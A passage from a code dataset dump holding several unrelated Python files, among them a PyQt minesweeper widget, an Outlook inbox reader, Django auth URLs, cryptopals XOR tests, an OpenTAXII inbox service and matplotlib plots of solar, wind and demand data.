mouseEvent.pos() - QPoint(self.lineWidth(), self.lineWidth())\n i = pos.x() // GameController.CELL_SIZE\n j = pos.y() // GameController.CELL_SIZE\n # due to imperfect bevel size there might be one pixel on and off\n # that causes the index go beyond the limit. we simply treat it as clicked on bevel\n if i == GameController.CELL_COUNT or j == GameController.CELL_COUNT:\n print(\"clicked on bevel\")\n return\n cell = self.game.cells[i][j]\n # check if clicked on already opened cell\n if cell.open:\n return\n if mouseEvent.button() == Qt.LeftButton:\n if not cell.flag: # if flag is set, don't do anything\n if cell.mine:\n cell.open = True\n cell.current = True\n print(\"boom!\")\n self._open_all_mines()\n self.game.stop_game(False)\n else:\n # recursively open cells around current one\n self.game.open_cells_recursively(i, j)\n cell.open = True\n else:\n if not cell.open:\n if cell.flag: # if flag already set, remote it\n cell.flag = False\n self.game.set_flags_count(self.game.flags + 1)\n else: # otherwise set the flag\n if self.game.flags > 0:\n cell.flag = True\n self.game.set_flags_count(self.game.flags - 1)\n # call parent widget mouse click method\n QFrame.mousePressEvent(self, mouseEvent)\n # repaint the widget\n self.update()\n\n def _draw_cell(self, painter, rect, cell):\n painter.save()\n if not cell.open:\n painter.drawPixmap(rect.x(), rect.y(), self.cell_raised_image)\n if cell.flag:\n sz = (rect.size() - self.flag_image.size())\n x = sz.width() // 2\n y = sz.height() // 2\n painter.drawPixmap(rect.x() + x, rect.y() + y, self.flag_image)\n painter.setPen(Qt.black)\n else:\n painter.fillRect(rect, Qt.lightGray)\n if cell.mine:\n sz = (rect.size() - self.mine_image.size())\n x = sz.width() // 2\n y = sz.height() // 2\n if cell.current:\n painter.fillRect(rect, Qt.red)\n painter.drawPixmap(rect.x() + x, rect.y() + y, self.mine_red_image)\n else:\n painter.drawPixmap(rect.x() + x, rect.y() + y, self.mine_image)\n else:\n if cell.border != 0:\n # draw number\n font = painter.font()\n font.setPixelSize(rect.height())\n painter.setFont(font)\n painter.setPen(Qt.blue)\n painter.drawText(rect, Qt.AlignHCenter | Qt.AlignVCenter, str(cell.border))\n painter.setPen(Qt.gray)\n painter.drawRect(rect.adjusted(0, 0, -1, -1))\n painter.restore()\n\n def _clicked_on_bevel(self, pos):\n bevel_width = self.lineWidth() + 2\n inside_hor_edge = pos.x() <= bevel_width or pos.x() >= self.width() - bevel_width\n inside_ver_edge = pos.y() <= bevel_width or pos.y() >= self.height() - bevel_width\n return inside_hor_edge or inside_ver_edge\n\n def _open_all_mines(self):\n for i in range(GameController.CELL_COUNT):\n for j in range(GameController.CELL_COUNT):\n if self.game.cells[i][j].mine:\n self.game.cells[i][j].open = True\n\n def reset(self):\n self.game.restart_game()\n","sub_path":"playground.py","file_name":"playground.py","file_ext":"py","file_size_in_byte":5325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"227990654","text":"#!/usr/bin/python\r\n\"\"\"Script to fetch email from outlook.\"\"\"\r\nimport os\r\nfrom win32com.client import Dispatch\r\nimport win32com.client\r\ndef extract(count):\r\n \"\"\"Get emails from outlook.\"\"\"\r\n items = []\r\n outlook = win32com.client.Dispatch(\"Mail.Application\").GetNamespace(\"MAPI\")\r\n inbox = outlook.GetDefaultFolder(6) # \"6\" refers to the inbox\r\n messages = inbox.Items\r\n message = messages.GetFirst()\r\n i = 0\r\n while message:\r\n try:\r\n message = dict()\r\n message[\"Subject\"] = getattr(message, \"Subject\", \"\")\r\n message[\"SentOn\"] = getattr(message, \"SentOn\", \"\")\r\n message[\"EntryID\"] = getattr(message, \"EntryID\", \"\")\r\n message[\"Sender\"] = getattr(message, \"Sender\", \"\")\r\n message[\"Size\"] = getattr(message, \"Size\", \"\")\r\n message[\"Body\"] = getattr(message, \"Body\", \"\")\r\n items.append(message)\r\n except Exception as ex:\r\n print(\"Error processing mail\", ex)\r\n i += 1\r\n if i < count:\r\n message = messages.GetNext()\r\n else:\r\n return items\r\n return items\r\ndef show_message(items):\r\n \"\"\"Show the messages.\"\"\"\r\n items.sort(key=lambda tup: tup[\"SentOn\"])\r\n for i in items:\r\n print(i[\"SentOn\"], i[\"Subject\"])\r\ndef main():\r\n \"\"\"Fetch and display top message.\"\"\"\r\n items = extract(5)\r\n show_message(items)\r\nif __name__ == \"__main__\":\r\n main()","sub_path":"alert-email/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"531445271","text":"from django.urls import path\nfrom .views import LogInView, LogOutView, SignUpView\n\n\napp_name = \"users_auth\"\n\nurlpatterns = [\n path('login/', LogInView.as_view(), name='login'),\n path('logout/', LogOutView.as_view(), name='logout'),\n path('register/', SignUpView.as_view(), name='register'),\n]","sub_path":"users_auth/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"290540391","text":"import pandas as pd\n\ndef getARFFData(filename='iris.arff') :\n with open(filename) as rest :\n lines = rest.readlines()\n\n attrs = [line.strip('\\n') for line in lines if line.lower().startswith('@attribute')]\n attrNames = [line.strip('\\n').split()[1] for line in lines if line.lower().startswith('@attribute')]\n dataIndex = lines.index('@data\\n')\n data = [line.strip('\\n').split(',') for line in lines[dataIndex+1:]]\n\n ### now let's make the pandas dataframe\n df = pd.DataFrame(data, columns=attrNames)\n\n ## let's make a dictionary that maps atrtribute names to possible values.\n attributeDict = {}\n for a in attrs :\n name = a.split()[1]\n vals = a[a.find('{')+1:a.find('}')].split(', ')\n attributeDict[name] = vals\n return df, attributeDict\n\n","sub_path":"readARFF.py","file_name":"readARFF.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"150524648","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jul 21 11:22:13 2019\n\n@author: augustocbx\n\"\"\"\n\nentradas = [-1, 7, 5]\npesos = [0.8, 0.1, 0]\n\ndef soma (e, p):\n s = 0\n for i in range(3):\n #print(entradas[i])\n #print(pesos[i])\n s += e[i] * p[i]\n return s\n \ns = soma(entradas, pesos)\n\ndef stepFunction(soma):\n if(soma >= 1):\n return 1\n return 0\n\nr = stepFunction(s)","sub_path":"perceptron1.py","file_name":"perceptron1.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"19537258","text":"# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this\n# file, You can obtain one at http://mozilla.org/MPL/2.0/. */\n\n# Authors:\n# Michael Berg-Mohnicke \n#\n# Maintainers:\n# Currently maintained by the authors.\n#\n# This file has been created at the Institute of\n# Landscape Systems Analysis at the ZALF.\n# Copyright (C: Leibniz Centre for Agricultural Landscape Research (ZALF)\n\nimport sqlite3\n\ndef create():\n \"create soil grid\"\n\n with open(\"soil-profile-id_nrw_gk3.asc\", mode=\"w\") as fff:\n fff.write(\n\"\"\"ncols 250\nnrows 241\nxllcorner 3280914.799999999800\nyllcorner 5580000.500000000000\ncellsize 1000.000000000000\nNODATA_value -9999\n\"\"\")\n\n query = \"select row, column, grid_id from MACSUR_WP3_soil_r1 order by row, column\"\n con = sqlite3.connect(\"soil.sqlite\")\n con.row_factory = sqlite3.Row\n values = {}\n for row in con.cursor().execute(query):\n values[(int(row[\"row\"]), int(row[\"column\"]))] = int(row[\"grid_id\"])\n con.close()\n\n for row in range(0, 241):\n for col in range(0, 250):\n rowcol = ((row + 282), col)\n fff.write(str(values[rowcol] if rowcol in values else -9999) + \" \" if col < 250 else \"\")\n fff.write(\"\\n\")\n\n\n#con = sqlite3.connect(\"soil.sqlite\")\n#x = soil_parameters(con, 197595)\n#print x\n\ncreate()\n","sub_path":"create-soil-grid.py","file_name":"create-soil-grid.py","file_ext":"py","file_size_in_byte":1468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"578645905","text":"\n# Strictly procedural:\ns = 0\nfor n in range(1, 10):\n if n % 3 == 0 or n % 5 == 0:\n s += n\nprint(s)\n\n\n# OOP\nm = list()\nfor n in range(1, 10):\n if n % 3 == 0 or n % 5 == 0:\n m.append(n)\nprint(sum(m))\n\n\nclass SummableList(list):\n def sum(self):\n s = 0\n for v in self.__iter__():\n s += v\n return s\n\n \n# Functional\ndef sum(seq):\n if len(seq) == 0: return 0\n return seq[0] + sum(seq[1:])\n\ndef until(n, filter_func, v):\n if v == n: return []\n if filter_func(v): return [v] + until(n, filter_func, v + 1)\n else: return until(n, filter_func, v + 1)\n\nmult_3_5 = lambda x: x % 3 == 0 or x % 5 == 0\n\n# Tests\nprint(mult_3_5(3)) # True\nprint(mult_3_5(4)) # False\nprint(mult_3_5(5)) # True\n\nprint(until(10, mult_3_5, 0)) # [0, 3, 5, 6, 9]\n\n\n","sub_path":"functional/01_intro/01_procedural_paradigm.py","file_name":"01_procedural_paradigm.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"480807533","text":"#!/usr/bin/env python\n\nimport unittest\n\nfrom problem_05 import CircularBuffer\nfrom problem_05 import repeating_key_xor\n\n\nclass TestProblemFive(unittest.TestCase):\n def test_circular_buffer_with_no_characters(self):\n circle = CircularBuffer('')\n self.assertEqual([each for each in circle], [])\n\n def test_circular_buffer_with_one_character(self):\n circle = CircularBuffer('z')\n result = [circle.next() for _ in range(3)]\n expected = ['z', 'z', 'z']\n self.assertEqual(result, expected)\n\n def test_circular_buffer_with_many_characters(self):\n circle = CircularBuffer('test')\n result = [circle.next() for _ in range(8)]\n expected = ['t', 'e', 's', 't', 't', 'e', 's', 't']\n self.assertEqual(result, expected)\n\n def test_repeating_key_xor(self):\n key = 'ICE'\n decrypted = ('Burning \\'em, if you ain\\'t quick and nimble\\n'\n 'I go crazy when I hear a cymbal')\n encrypted = ('0b3637272a2b2e63622c2e69692a23693a2a3c6324202d623d63343c2'\n 'a26226324272765272a282b2f20430a652e2c652a3124333a653e2b20'\n '27630c692b20283165286326302e27282f')\n\n self.assertEqual(repeating_key_xor(key, decrypted), encrypted)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"set_01/test_problem_05.py","file_name":"test_problem_05.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"95204218","text":"\nfrom libtaxii.constants import (\n SVC_INBOX, MSG_INBOX_MESSAGE, SD_ACCEPTABLE_DESTINATION,\n ST_DESTINATION_COLLECTION_ERROR, ST_NOT_FOUND, SD_ITEM\n)\n\nfrom ..utils import is_content_supported\nfrom ..entities import ContentBindingEntity\nfrom ..exceptions import StatusMessageException\n\nfrom ..converters import content_binding_entities_to_content_bindings, service_to_service_instances\n\nfrom .abstract import TaxiiService\nfrom .handlers import InboxMessageHandler\n\n\nclass InboxService(TaxiiService):\n\n service_type = SVC_INBOX\n\n handlers = {\n MSG_INBOX_MESSAGE : InboxMessageHandler\n }\n\n destination_collection_required = False\n accept_all_content = False\n supported_content = []\n\n\n def __init__(self, accept_all_content=False, destination_collection_required=False,\n supported_content=[], **kwargs):\n\n super(InboxService, self).__init__(**kwargs)\n\n self.accept_all_content = accept_all_content\n self.supported_content = map(ContentBindingEntity, supported_content)\n\n self.destination_collection_required = destination_collection_required\n\n\n def is_content_supported(self, content_binding, version=None):\n\n if self.accept_all_content:\n return True\n\n return is_content_supported(self.supported_content, content_binding, version=version)\n\n\n def get_destination_collections(self):\n return self.server.persistence.get_collections(self.id)\n\n\n def validate_destination_collection_names(self, name_list, in_response_to):\n\n name_list = name_list or []\n\n if (self.destination_collection_required and not name_list) or \\\n (not self.destination_collection_required and name_list):\n\n if not name_list:\n message = 'A Destination_Collection_Name is required and none were specified'\n else:\n message = 'Destination_Collection_Names are prohibited for this Inbox Service'\n\n details = {SD_ACCEPTABLE_DESTINATION: [c.name for c in self.get_destination_collections() if c.enabled]}\n\n raise StatusMessageException(ST_DESTINATION_COLLECTION_ERROR, message=message,\n in_response_to=in_response_to, extended_headers=details)\n\n if not name_list:\n return []\n\n collections = []\n\n destinations_map = dict((c.name, c) for c in self.get_destination_collections())\n\n for name in name_list:\n if name in destinations_map:\n collections.append(destinations_map[name])\n else:\n raise StatusMessageException(ST_NOT_FOUND, message='The Data Collection was not found',\n in_response_to=in_response_to, extended_headers={SD_ITEM: name})\n\n return collections\n\n\n def to_service_instances(self, version):\n\n service_instances = service_to_service_instances(self, version)\n\n if self.accept_all_content:\n return service_instances\n\n for si in service_instances:\n si.inbox_service_accepted_content = self.get_supported_content(version)\n\n return service_instances\n\n\n\n def get_supported_content(self, version):\n\n if self.accept_all_content:\n return []\n\n return content_binding_entities_to_content_bindings(self.supported_content, version)\n\n","sub_path":"opentaxii/taxii/services/inbox.py","file_name":"inbox.py","file_ext":"py","file_size_in_byte":3326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"623424021","text":"#用一个多重集对文本中的单词进行编码处理\ncorpus = [\n'UNC played Duke in basketball',\n'Duke lost the basketball game'\n] #包含两个文档\n\n#总共有8个不同的单词,第一个文档的第一个词是UNC,所以向量的第一个元素为1\n#第一个文档没有包含game,所以特征向量的第8个元素为0\nfrom sklearn.feature_extraction.text import CountVectorizer\nvectorizer=CountVectorizer()\nX = vectorizer.fit_transform(corpus) #建立字典表,需要先传入文档\n\nprint(vectorizer.get_feature_names()) #查看文档中的特征词\n# ['basketball', 'duke', 'game', 'in', 'lost', 'played', 'the', 'unc']\n\nprint(vectorizer.vocabulary_) #查看词所对应的数字\n# {'unc': 7, 'played': 5, 'duke': 1, 'in': 3, 'basketball': 0, 'lost': 4, 'the': 6, 'game': 2}\n\nprint(X.toarray())#转化为稀疏矩阵\n\ncorpus.append('I ate a sandwich')\nprint(vectorizer.fit_transform(corpus).todense())\nprint(vectorizer.vocabulary_)\n","sub_path":"Feature extraction/词袋模型.py","file_name":"词袋模型.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"341379814","text":"#!/usr/bin/env python\n\n\nimport os\nimport sys\nimport numpy as np\n\n\ndef die(message):\n sys.stderr.write(\"Error: {}\\n\".format(message))\n sys.exit(1)\n\n\ndef readFiles(inFiles):\n npw = []\n evc = []\n for inFile in inFiles:\n with open(inFile) as f:\n lines = f.readlines()\n npw_part = len(lines)\n evc_part = np.zeros(npw_part, dtype=np.complex128)\n for i, line in enumerate(lines):\n evc_part[i] = np.float64(line.split()[0]) + 1j * np.float64(line.split()[2])\n npw.append(npw_part)\n evc.append(evc_part)\n return npw, evc\n\n\ndef calcOverlap(evc):\n # calculate and sum product of wavefunctions\n p1 = np.conjugate(evc[0]) * evc[0]\n p2 = np.conjugate(evc[1]) * evc[1]\n p3 = np.conjugate(evc[0]) * evc[1]\n # return np.absolute(np.sum(product))/ngtot\n return np.absolute(np.sum(p1)), np.absolute(np.sum(p2)), np.absolute(np.sum(p3)) \n\n\ndef calcSum(evc):\n # calculate sum\n return np.absolute(np.sum(evc[0])), np.absolute(np.sum(evc[1])), np.absolute(np.sum(evc[2]))\n\n\nlf = False\nwhile len(sys.argv) > 1:\n if sys.argv[1] == \"-f\":\n lf = True\n del sys.argv[1]\n elif sys.argv[1] == \"-w\":\n lf = False\n del sys.argv[1]\n elif sys.argv[1].startswith(\"-\"):\n die (\"Unrecognized options: {}\".format(sys.argv[1]))\n else:\n break\n\nif lf and len(sys.argv) == 4:\n inFiles = sys.argv[1:4]\nelif not lf and len(sys.argv) == 3:\n inFiles = sys.argv[1:3]\nelse:\n die(\"Incorrect number of files specified: {}\".format(len(sys.argv) - 1))\n\nnpw, evc = readFiles(inFiles)\n\nfor i in range(len(npw) - 1):\n if npw[i] != npw[i+1]:\n die(\"npw from file{} and file{} differ: npw = {} and {}, respectively\".format(i,i+1,npw[i],npw[i+1]))\n\nif not lf:\n p1, p2, p3 = calcOverlap(evc)\nelse:\n p1, p2, p3 = calcSum(evc)\n\n\nprint(\"||^2 = {}\".format(p1))\nprint(\"||^2 = {}\".format(p2))\nprint(\"||^2 = {}\".format(p3))\n\n","sub_path":"qe-utility/check_norm.py","file_name":"check_norm.py","file_ext":"py","file_size_in_byte":1972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"232051784","text":"\"\"\"\n 使用Prcess创建两个子进程,同时复制一个文件,分别复制文件的前半部分和后半部分\n\"\"\"\nADDR = '/home/tarena/wpy/DataStructure/day01/singlelink.py'\nimport os\nimport multiprocessing as mp\nm = os.path.getsize(ADDR)\nc = open(ADDR,'rb')\ns = open('file01','wb')\nb = open('file02','wb')\ndef fun01():\n s.write(c.read(int(m/2)))\n s.flush()\n s.close()\n return c.tell()\n\np = mp.Process(target=fun01)\np.start()\nb.seek(fun01())\nb.write(c.read(int(m / 2)))\nb.flush()\nb.close()\np.join()","sub_path":"month02/day06/homework.py","file_name":"homework.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"415038360","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Aug 28 17:22:12 2019\n\n@author: katherinerinaldi\n\"\"\"\n\nimport csv\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\n\npath = '/Users/jacquelinedowling/MEM_Nov2019/SEM-1.2/Input_Data/Lei_Solar_Wind/'\n\n\n\ndemand = '{}US_demand_unnormalized_FOURTY_YEARS_FROM_FOUR_YEAR_LOOP.csv'.format(path)\nwind = '{}US_wind_thresh.csv'.format(path)\nsolar = '{}US_solar_thresh.csv'.format(path)\n\n\n#this takes in the file and gets rid of all lines before BEGIN_DATA\n#then it returns a pandas dataframe\n\ndef getData(filename):\n with open(filename) as file:\n reader = csv.reader(file)\n \n #read to keyword 'BEGIN_DATA'\n while True:\n line = next(reader)\n if line[0] == 'BEGIN_DATA':\n break\n \n #take all non-blank lines\n data = []\n while True:\n try:\n line = next(reader)\n if any(field.strip() for field in line):\n data.append(line)\n except:\n break\n \n# #turn data dataframe\n df = pd.DataFrame(data)\n headers = df.iloc[0]\n data_array = pd.DataFrame(df.values[1:], columns=headers)\n\n return data_array\n\n\n# this makes the new 'date' column in each type of dataframe (depending on how\n# the original file is formatted there are diff options)\ndef dateMaker(df, dataType):\n if dataType == 'wind':\n df['wind capacity']=df['wind capacity'].astype(float)\n elif dataType == 'solar':\n df['solar capacity']=df['solar capacity'].astype(float)\n elif dataType == 'demand':\n df['demand (MW)']=df['demand (MW)'].astype(float)\n df['hour']=df['hour'].astype(int)\n df['hour']=df['hour']-1\n dates=pd.to_datetime(df[['year', 'month', 'day', 'hour']])\n df['date'] = dates\n df.set_index(['date'], inplace=True)\n \ndef stat_quantile(groupby_dataframe, quantile):\n\toutput = groupby_dataframe.quantile(q = quantile)\n\treturn output\n\n#sorts out the data by season (winter or summer), groups by hour of day\ndef getSeasons(df, season, dataType):\n if dataType == 'demand':\n df_gb_month = df.groupby(df.index.month)['demand (MW)']\n elif dataType =='solar': \n df_gb_month = df.groupby(df.index.month)['solar capacity']\n elif dataType == 'wind':\n df_gb_month= df.groupby(df.index.month)['wind capacity']\n \n if season == 'summer':\n season_df = df_gb_month.get_group(6).append(df_gb_month.get_group(7))\n season_df = season_df.append(df_gb_month.get_group(8))\n if season == 'winter':\n season_df = df_gb_month.get_group(12).append(df_gb_month.get_group(1))\n season_df = season_df.append(df_gb_month.get_group(2))\n \n season_df_gb = season_df.groupby(season_df.index.hour) \n \n return season_df_gb\n\ndef time_shift(array, hourstoshift):\n\n\tfor i in range(hourstoshift):\n\n\t\trow = array.iloc[0] # take stock of first row\n\t\tarray = array.shift(-1) # remove first entry and shift all data up one row\n\t\tarray.iloc[-1] = row # put old first row as last row\n\n\t\n\tarray = array.values\n\treturn array\n\n#get the data\ndemand_df = getData(demand)\nsolar_df = getData(solar)\nwind_df = getData(wind)\n\n#turn the year month day columns into one new column called date\ndateMaker(demand_df, 'demand')\ndateMaker(solar_df, 'solar')\ndateMaker(wind_df, 'wind')\n\n#normalize the data (ie divide by the 39 year mean)\ndemand_mean = demand_df['demand (MW)'].mean()\nsolar_mean = solar_df['solar capacity'].mean()\nwind_mean = wind_df['wind capacity'].mean()\n\ndemand_df['demand (MW)']=demand_df['demand (MW)']/demand_mean\nsolar_df['solar capacity']=solar_df['solar capacity']/solar_mean\nwind_df['wind capacity']=wind_df['wind capacity']/wind_mean\n\n#make y values for plotting main fig (resample to take the daily mean)\ndailyMean_demand = demand_df.resample('D').mean()\ndailyMean_solar = solar_df.resample('D').mean()\ndailyMean_wind = wind_df.resample('D').mean()\n\n#groups each value by day of year (can compare the same day in many diff years)\ndemand_gb=dailyMean_demand.groupby(dailyMean_demand.index.dayofyear)\nsolar_gb=dailyMean_solar.groupby(dailyMean_solar.index.dayofyear)\nwind_gb=dailyMean_wind.groupby(dailyMean_wind.index.dayofyear)\n\n#median for each day\ny_demand = demand_gb.median()\ny_solar = solar_gb.median()\ny_wind = wind_gb.median()\n\n#makes the 50% / 100% areas\ndemand_fourth_quartile = stat_quantile(demand_gb, 1)\ndemand_third_quartile = stat_quantile(demand_gb, 0.75)\ndemand_first_quartile = stat_quantile(demand_gb, 0.25)\ndemand_zeroth_quartile = stat_quantile(demand_gb, 0)\n\nsolar_fourth_quartile = stat_quantile(solar_gb, 1)\nsolar_third_quartile = stat_quantile(solar_gb, 0.75)\nsolar_first_quartile = stat_quantile(solar_gb, 0.25)\nsolar_zeroth_quartile = stat_quantile(solar_gb, 0)\n\nwind_fourth_quartile = stat_quantile(wind_gb, 1)\nwind_third_quartile = stat_quantile(wind_gb, 0.75)\nwind_first_quartile = stat_quantile(wind_gb, 0.25)\nwind_zeroth_quartile = stat_quantile(wind_gb, 0)\n\n#make data for subplot 1 (hourly summer for Jun-6, July-7, August-8)\nsummer_demand = getSeasons(demand_df, 'summer', 'demand')\nsummer_solar = getSeasons(solar_df, 'summer', 'solar')\nsummer_wind = getSeasons(wind_df, 'summer', 'wind')\n\n#make data for subplot 2 (hourly winter for dec-12, jan-1, and feb-2)\nwinter_demand = getSeasons(demand_df, 'winter', 'demand')\nwinter_solar = getSeasons(solar_df, 'winter', 'solar')\nwinter_wind = getSeasons(wind_df, 'winter', 'wind')\n\n#make y values for subplots\ny_summer_demand = time_shift(summer_demand.median(),7)\ny_summer_solar = time_shift(summer_solar.median(),7)\ny_summer_wind = time_shift(summer_wind.median(),7)\n\ny_winter_demand = time_shift(winter_demand.median(),7)\ny_winter_solar = time_shift(winter_solar.median(),7)\ny_winter_wind = time_shift(winter_wind.median(),7)\n\n#makes the 50% / 100% areas for summer and winter subplots\nsummer_demand_fourth_quartile = time_shift(stat_quantile(summer_demand, 1),7)\nsummer_demand_third_quartile = time_shift(stat_quantile(summer_demand, 0.75),7)\nsummer_demand_first_quartile = time_shift(stat_quantile(summer_demand, 0.25),7)\nsummer_demand_zeroth_quartile = time_shift(stat_quantile(summer_demand, 0),7)\n\nsummer_solar_fourth_quartile = time_shift(stat_quantile(summer_solar, 1),7)\nsummer_solar_third_quartile = time_shift(stat_quantile(summer_solar, 0.75),7)\nsummer_solar_first_quartile = time_shift(stat_quantile(summer_solar, 0.25),7)\nsummer_solar_zeroth_quartile = time_shift(stat_quantile(summer_solar, 0),7)\n\nsummer_wind_fourth_quartile = time_shift(stat_quantile(summer_wind, 1),7)\nsummer_wind_third_quartile = time_shift(stat_quantile(summer_wind, 0.75),7)\nsummer_wind_first_quartile = time_shift(stat_quantile(summer_wind, 0.25),7)\nsummer_wind_zeroth_quartile = time_shift(stat_quantile(summer_wind, 0),7)\n\nwinter_demand_fourth_quartile = time_shift(stat_quantile(winter_demand, 1),7)\nwinter_demand_third_quartile = time_shift(stat_quantile(winter_demand, 0.75),7)\nwinter_demand_first_quartile = time_shift(stat_quantile(winter_demand, 0.25),7)\nwinter_demand_zeroth_quartile = time_shift(stat_quantile(winter_demand, 0),7)\n\nwinter_solar_fourth_quartile = time_shift(stat_quantile(winter_solar, 1),7)\nwinter_solar_third_quartile = time_shift(stat_quantile(winter_solar, 0.75),7)\nwinter_solar_first_quartile = time_shift(stat_quantile(winter_solar, 0.25),7)\nwinter_solar_zeroth_quartile = time_shift(stat_quantile(winter_solar, 0),7)\n\nwinter_wind_fourth_quartile = time_shift(stat_quantile(winter_wind, 1),7)\nwinter_wind_third_quartile = time_shift(stat_quantile(winter_wind, 0.75),7)\nwinter_wind_first_quartile = time_shift(stat_quantile(winter_wind, 0.25),7)\nwinter_wind_zeroth_quartile = time_shift(stat_quantile(winter_wind, 0),7)\n\n\n\nx_values = range(len(y_demand))\nx_season_values = range(len(y_summer_demand))\n\n#plot\n \nmonths = ['Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec']\n\n#params = {'legend.fontsize': 'medium',\n# 'figure.figsize': (7, 3.5), #7 3.5\n# 'axes.labelsize': 'x-large',\n# 'axes.titlesize':'x-large',\n# 'xtick.labelsize':'large',\n# 'ytick.labelsize':'large'}\n#\n#plt.rcParams.update(params)\n\ngridsize = (3, 2)\nfig = plt.figure(figsize=(7, 6.75))\nax1 = plt.subplot2grid(gridsize, (0, 0), colspan=2, rowspan=2)\nax2 = plt.subplot2grid(gridsize, (2, 0))\nax3 = plt.subplot2grid(gridsize, (2, 1))\n\n\nax1.plot(x_values, y_demand, color='black', linewidth='2', label='demand')\nax1.fill_between(x_values, demand_zeroth_quartile['demand (MW)'], demand_fourth_quartile['demand (MW)'], alpha = 0.2, facecolor = 'black')\nax1.fill_between(x_values, demand_first_quartile['demand (MW)'], demand_third_quartile['demand (MW)'], alpha = 0.5, facecolor = 'black')\n\nax1.plot(x_values, y_solar, color='orange', linewidth='2', label='solar')\nax1.fill_between(x_values, solar_zeroth_quartile['solar capacity'], solar_fourth_quartile['solar capacity'], alpha = 0.2, facecolor = 'orange', edgecolor = 'orange')\nax1.fill_between(x_values, solar_first_quartile['solar capacity'], solar_third_quartile['solar capacity'], alpha = 0.5, facecolor = 'orange', edgecolor = 'orange')\n\nax1.plot(x_values, y_wind, color='blue', linewidth='2', label='wind')\nax1.fill_between(x_values, wind_zeroth_quartile['wind capacity'], wind_fourth_quartile['wind capacity'], alpha = 0.2, facecolor = 'blue')\nax1.fill_between(x_values, wind_first_quartile['wind capacity'], wind_third_quartile['wind capacity'], alpha = 0.5, facecolor = 'blue')\n\n\nax1.set_ylabel('Power divided by 39-year mean', fontsize = 14, color = 'black')\nax1.set_xlim(0, 365)\nax1.set_ylim(0,3)\nax1.set_xticks(np.arange(10, 360, 31))\nax1.set_xticklabels(months, fontsize = 12)\nax1.set_xlabel('Month of year', fontsize=14)\n\n\n\nax2.plot(x_season_values, y_summer_demand, color='black', linewidth='2', label='demand')\nax2.fill_between(x_season_values, summer_demand_zeroth_quartile, summer_demand_fourth_quartile, alpha = 0.2, facecolor = 'black')\nax2.fill_between(x_season_values, summer_demand_first_quartile, summer_demand_third_quartile, alpha = 0.5, facecolor = 'black')\n\nax2.plot(x_season_values, y_summer_solar, color='orange', linewidth='2', label='solar')\nax2.fill_between(x_season_values, summer_solar_zeroth_quartile, summer_solar_fourth_quartile, alpha = 0.2, facecolor = 'orange', edgecolor='orange')\nax2.fill_between(x_season_values, summer_solar_first_quartile, summer_solar_third_quartile, alpha = 0.5, facecolor = 'orange', edgecolor='orange')\n\nax2.plot(x_season_values, y_summer_wind, color='blue', linewidth='2', label='wind')\nax2.fill_between(x_season_values, summer_wind_zeroth_quartile, summer_wind_fourth_quartile, alpha = 0.2, facecolor = 'blue')\nax2.fill_between(x_season_values, summer_wind_first_quartile, summer_wind_third_quartile, alpha = 0.5, facecolor = 'blue')\n\nax2.set_xlim(0, 23)\nax2.set_ylim(-0.2, 3.5)\nax2.set_xticks(np.arange(0,23,4))\nax2.set_ylabel('Power divided by \\n 39-year mean', fontsize = 14)\nax2.set_xlabel('Hour of day (PST)', fontsize=14)\nax2.set_title('Summer', fontsize=14)\n\nax3.plot(x_season_values, y_winter_demand, color='black', linewidth='2', label='demand')\nax3.fill_between(x_season_values, winter_demand_zeroth_quartile, winter_demand_fourth_quartile, alpha = 0.2, facecolor = 'black')\nax3.fill_between(x_season_values, winter_demand_first_quartile, winter_demand_third_quartile, alpha = 0.5, facecolor = 'black')\n\nax3.plot(x_season_values, y_winter_solar, color='orange', linewidth='2', label='solar')\nax3.fill_between(x_season_values, winter_solar_zeroth_quartile, winter_solar_fourth_quartile, alpha = 0.2, facecolor = 'orange',edgecolor='orange')\nax3.fill_between(x_season_values, winter_solar_first_quartile, winter_solar_third_quartile, alpha = 0.5, facecolor = 'orange',edgecolor='orange')\n\nax3.plot(x_season_values, y_winter_wind, color='blue', linewidth='2', label='wind')\nax3.fill_between(x_season_values, winter_wind_zeroth_quartile, winter_wind_fourth_quartile, alpha = 0.2, facecolor = 'blue')\nax3.fill_between(x_season_values, winter_wind_first_quartile, winter_wind_third_quartile, alpha = 0.5, facecolor = 'blue')\n\nax3.set_xlim(0, 23)\nax3.set_ylim(-0.2, 3.5)\nax3.set_xticks(np.arange(0,23,4))\nax3.set_xlabel('Hour of day (PST)', fontsize=14)\nax3.set_title('Winter', fontsize=14)\n\nfig.text(0.13, 0.93, 'a)', size='large')\nfig.text(0.13, 0.265, 'b)', 